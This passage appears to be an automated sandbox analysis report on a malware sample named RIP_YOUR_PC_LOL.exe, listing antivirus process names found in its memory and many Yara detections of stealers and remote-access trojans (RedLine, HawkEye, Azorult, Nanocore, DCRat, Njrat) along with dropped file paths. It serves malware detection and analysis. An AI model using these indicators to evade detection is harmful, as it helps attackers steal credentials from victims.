                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000014.00000003.641078460.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected MailPassView
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.4698e10.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.4698e10.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f6fa72.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED
                    Yara detected HawkEye Keylogger
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED
                    Yara detected Azorult Info Stealer
                    Source: Yara matchFile source: 00000019.00000003.459495184.0000000000673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.459275166.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.458681148.000000000067C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.458183685.0000000000660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Nanocore RAT
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000025.00000000.491609227.00000000002A2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPED
                    Yara detected Generic Dropper
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Yara detected Azorult
                    Source: Yara matchFile source: 00000019.00000003.459495184.0000000000673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.459275166.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.458681148.000000000067C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.458183685.0000000000660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Njrat
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
